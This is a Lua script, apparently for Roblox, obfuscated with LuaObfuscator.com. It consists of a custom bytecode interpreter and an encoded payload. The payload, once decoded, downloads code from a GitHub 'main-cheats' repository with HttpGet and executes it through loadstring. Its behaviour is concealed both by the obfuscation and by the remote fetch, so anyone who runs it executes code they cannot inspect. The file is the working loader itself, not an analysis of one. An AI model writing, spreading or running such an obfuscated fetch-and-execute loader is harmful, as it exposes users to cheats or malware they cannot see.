--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v122=0;local v123;while true do if (v122==1) then return v123;end if (v122==0) then v123=v5(v88,v19);v19=nil;v122=1;end end else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=0;local v90;while true do if (v89==(0 -0)) then v90=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-(620 -(555 + (941 -(282 + 595)))))) + (932 -(857 + 74)))) ;return v90-(v90%1) ;end end else local v91=2^(v32-(569 -(367 + 201))) ;return (((v31%(v91 + v91))>=v91) and ((146 + 782) -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * 256) + v35 ;end local function v23() local v37=(350 -(87 + 263)) -0 ;local v38;local v39;local v40;local v41;while true do if (v37==((1246 -(67 + 113)) -(50 + 18 + (2447 -1450)))) then return (v41 * (16778486 -(226 + 1044))) + (v40 * 65536) + (v39 * (610 -354)) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (121 -(32 + 85)) ;v37=1 -0 ;end end end local function v24() local v42=(766 -(745 + 21)) + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -2)) then v45=953 -(316 + 486 + 52 + 98) ;v46=(v20(v44,439 -((398 -253) + 293) ,53 -33 ) * ((1488 -(998 + 488))^(57 -25))) + v43 ;v42=2;end if (v42==(6 -4)) then v47=v20(v44,16 + 5 ,(2775 -(760 + 987)) -(915 + 82) );v48=((v20(v44,804 -(201 + 571) )==(2 -1)) and  -(1 + 0)) or (1 -0) ;v42=10 -7 ;end if (v42==((4655 -3468) -(1069 + 118))) then v43=v23();v44=v23();v42=2 -1 ;end if (v42==(6 -3)) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=791 -(368 + 423) ;end elseif (v47==(6433 -4386)) then return ((v46==(18 -(10 + 8))) and (v48 * (((9 + 1072) -(1020 + 48 + 12))/((1055 -(87 + 968)) -0)))) or (v48 * NaN) ;end return v8(v48,v47-((3378 -(1789 + 124)) -(416 + 26)) ) * (v45 + (v46/(((26 -20) -4)^(165 -113)))) ;end end end local function v25(v49) local v50;if  not v49 then local v92=0 + 0 ;while true do if ((0 -0)==v92) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1414 -(447 + 966)) );v18=v18 + v49 ;local v51={};for v67=2 -1 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 1384 -(746 + 638) ;end)();local v94=(function() return;end)();local v96=(function() return;end)();while true do if (v93~=(1905 -(1881 + 24))) then else local v118=(function() return 0;end)();local v119=(function() return;end)();while true do if (v118~=(0 -0)) then else v119=(function() return 0 -0 ;end)();while true do if (v119==(1582 -(1535 + 46))) then v93=(function() return  #"/";end)();break;end if (v119~=0) then else v94=(function() return v95();end)();v96=(function() return nil;end)();v119=(function() return 1 + 0 ;end)();end end break;end end end if (v93== #"}") then if (v94== #"|") then v96=(function() return v95()~=(0 + 0) ;end)();elseif (v94==(1765 -(454 + 1309))) then v96=(function() return v97();end)();elseif (v94== #"gha") then v96=(function() return v98();end)();end v99[v100]=(function() return v96;end)();break;end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v53=(function() return function(v101,v102,v103) local v104=(function() return 560 -(306 + 254) ;end)();local v105=(function() return;end)();while true do if (v104~=(0 + 0)) then else v105=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v105) then else v101[v102-#" " ]=(function() return v103();end)();return v101,v102,v103;end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"{",v58 do FlatIdent_39B0,Type,v21,Cons,v24,v25,v59,v69=(function() return v52(FlatIdent_39B0,Type,v21,Cons,v24,v25,v59,v69);end)();end v57[ #"nil"]=(function() return v21();end)();for v70= #"}",v23() do local v71=(function() return v21();end)();if (v20(v71, #">", #"\\")~=(0 -0)) then else local v109=(function() return 1467 -(899 + 568) ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v109==(5 -3)) then while true do if (v110==0) then local v125=(function() return 0 -0 ;end)();while true do if (v125~=1) then else v110=(function() return  #"[";end)();break;end if (v125~=(285 -(134 + 151))) then else v111=(function() return v20(v71,1667 -(970 + 695) , #"91(");end)();v112=(function() return v20(v71, #".dev",6);end)();v125=(function() return 1;end)();end end end if ( #"-19"==v110) then if (v20(v112, #"gha", #"xxx")== #"<") then v113[ #".com"]=(function() return v59[v113[ #"http"]];end)();end v54[v70]=(function() return v113;end)();break;end if (v110~= #">") then else local v127=(function() return 0;end)();local v128=(function() return;end)();while true do if (v127~=(0 -0)) then else v128=(function() return 572 -(426 + 146) ;end)();while true do if (v128~=(1990 -(582 + 1408))) then else v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==0) then local v182=(function() return 0;end)();while true do if (0~=v182) then else v113[ #"nil"]=(function() return v22();end)();v113[ #"asd1"]=(function() return v22();end)();break;end end elseif (v111== #".") then v113[ #"91("]=(function() return v23();end)();elseif (v111==(2 -0)) then v113[ #"-19"]=(function() return v23() -((1458 -(282 + 1174))^(60 -44)) ;end)();elseif (v111== #"gha") then local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if (v191==(1824 -(1195 + 629))) then v192=(function() return 0 + 0 ;end)();while true do if (v192==(0 -0)) then v113[ #"91("]=(function() return v23() -((243 -(187 + 54))^(796 -(162 + 618))) ;end)();v113[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v128=(function() return 1252 -(721 + 530) ;end)();end if (v128~=1) then else v110=(function() return 2 + 0 ;end)();break;end end break;end end end if ((2 + 0)==v110) then local v129=(function() return 0;end)();local v130=(function() return;end)();while true do if (v129~=0) then else v130=(function() return 0;end)();while true do if (0==v130) then if (v20(v112, #".", #".")~= #">") then else v113[3 -1 ]=(function() return v59[v113[2 -0 ]];end)();end if (v20(v112,2 + 0 ,702 -(271 + 429) )~= #"|") then else v113[ #"xxx"]=(function() return v59[v113[ #"gha"]];end)();end v130=(function() return 1 + 0 ;end)();end if (v130==(1501 -(1408 + 92))) then v110=(function() return  #"gha";end)();break;end end break;end end end end break;end if (v109~=(0 + 0)) then else local v121=(function() return 1288 -(993 + 295) ;end)();while true do if ((1636 -(1373 + 263))~=v121) then else v110=(function() return 1000 -(451 + 549) ;end)();v111=(function() return nil;end)();v121=(function() return 1 + 0 ;end)();end if ((1 -0)~=v121) then else v109=(function() return 1 -0 ;end)();break;end end end if (v109==(1 + 0)) then v112=(function() return nil;end)();v113=(function() return nil;end)();v109=(function() return 1 + 1 ;end)();end end end end for v72= #":",v23() do v55,v72,v28=(function() return v53(v55,v72,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[1 + 0 + (1899 -(260 + 1638)) ];local v66=v61[6 -3 ];return function(...) local v73=v64;local v74=v65;local v75=v66;local v76=v27;local v77=530 -(406 + 123) ;local v78= -(1770 -(1749 + 20));local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v106=0 -0 ,v81 do if (v106>=v75) then v79[v106-v75 ]=v80[v106 + (1323 -(1249 + 73)) ];else v83[v106]=v80[v106 + 1 + (440 -(382 + 58)) ];end end local v84=(v81-v75) + (1146 -(466 + 679)) ;local v85;local v86;while true do v85=v73[v77];v86=v85[2 -1 ];if (v86<=(6 + 2)) then if (v86<=(8 -(16 -11))) then if (v86<=((1580 + 321) -(106 + 1794))) then if (v86==(0 + 0)) then local v131=0 + 0 ;local v132;local v133;local v134;local v135;while true do if (((733 -(476 + 255))==v131) or (983==1808)) then for v176=v132,v78 do local v177=0 -0 ;while true do if (v177==(0 -0)) then v135=v135 + (1 -0) ;v83[v176]=v133[v135];break;end end end break;end if ((0 -0)==v131) then v132=v85[116 -(4 + 110) ];v133,v134=v76(v83[v132](v13(v83,v132 + 1 + 0 ,v85[587 -(57 + 527) ])));v131=1428 -((84 -43) + 1386) ;end if (((309 -205) -((1222 -(902 + 303)) + 86))==v131) then v78=(v134 + v132) -(1 + (0 -0)) ;v135=0 -0 ;v131=5 -3 ;end end else local v136=166 -(122 + 44) ;local v137;local v138;while true do if (v136==((0 -0) -0)) then v137=v85[1 + 0 + 1 ];v138=v83[v85[1507 -((2053 -(1121 + 569)) + 1141) ]];v136=3 -2 ;end if (v136==((215 -(22 + 192)) + 0)) then v83[v137 + 1 + 0 ]=v138;v83[v137]=v138[v85[7 -3 ]];break;end end end elseif (v86==(67 -(30 + 35))) then v83[v85[2]]=v63[v85[3 + 0 ]];else local v141=1257 -(1043 + 214) ;local v142;local v143;while true do if ((v141==(0 -0)) or (2150<=1197)) then v142=v85[1214 -(323 + 889) ];v143=v83[v85[7 -4 ]];v141=581 -(361 + 219) ;end if (v141==(321 -(53 + 267))) then v83[v142 + 1 + 0 ]=v143;v83[v142]=v143[v85[417 -(15 + 398) ]];break;end end end elseif ((3769>=1173) and (v86<=(5 + 0))) then if (v86>(860 -(564 + 292))) then do return;end else do return;end end elseif ((1485==1485) and (v86<=(988 -(18 + 964)))) then v83[v85[7 -5 ]]=v85[2 + 1 ];elseif ((v86>(5 + (685 -(483 + 200)))) or (3315<=2782)) then v83[v85[(2315 -(1404 + 59)) -(20 + 830) ]]={};else local v159=(0 -0) + 0 ;local v160;while true do if (((169 -43) -(116 + (775 -(468 + 297))))==v159) then v160=v85[2];v83[v160]=v83[v160](v13(v83,v160 + 1 + 0 ,v78));break;end end end elseif (v86<=12) then if (v86<=(748 -(542 + 196))) then if (v86==(3 + (568 -(334 + 228)))) then v83[v85[3 -1 ]]=v63[v85[1 + 2 ]];else v83[v85[2 + 0 ]]={};end elseif ((v86==(4 + 7)) or (876>=2964)) then v83[v85[4 -2 ]]=v85[3]~=(0 -(0 -0)) ;else v83[v85[4 -2 ]]();end elseif ((v86<=(35 -21)) or (2232>2497)) then if (v86>(1564 -(1126 + 425))) then v83[v85[407 -(118 + 287) ]]=v85[10 -7 ]~=((0 -0) -0) ;else v83[v85[1020 -((1263 -566) + 321) ]]();end elseif (v86<=(40 -25)) then local v151=v85[1123 -(118 + 1003) ];local v152,v153=v76(v83[v151](v13(v83,v151 + ((1 + 1) -1) ,v85[239 -(141 + 95) ])));v78=(v153 + v151) -(1 + 0) ;local v154=377 -(142 + 235) ;for v156=v151,v78 do local v157=0 -0 ;while true do if (v157==(0 + 0)) then v154=v154 + (612 -(602 + 9)) ;v83[v156]=v152[v154];break;end end end elseif ((v86>((976 + 17) -(553 + 424))) or (2110<=332)) then local v161=v85[3 -1 ];v83[v161]=v83[v161](v13(v83,v161 + 1 + 0 ,v78));else v83[v85[2 + 0 ]]=v85[2 + 1 ];end v77=v77 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403553Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6C2Q6F2Q6C656C6B656B2D626F742F6D61696E2D6368656174732F726566732F68656164732F6D61696E2F6C71776C65716C65000A4Q00087Q001202000100013Q001202000200023Q002003000200020003001210000400044Q000B000500014Q000F000200054Q000700013Q00022Q000D0001000100012Q00043Q00017Q00",v9(),...);
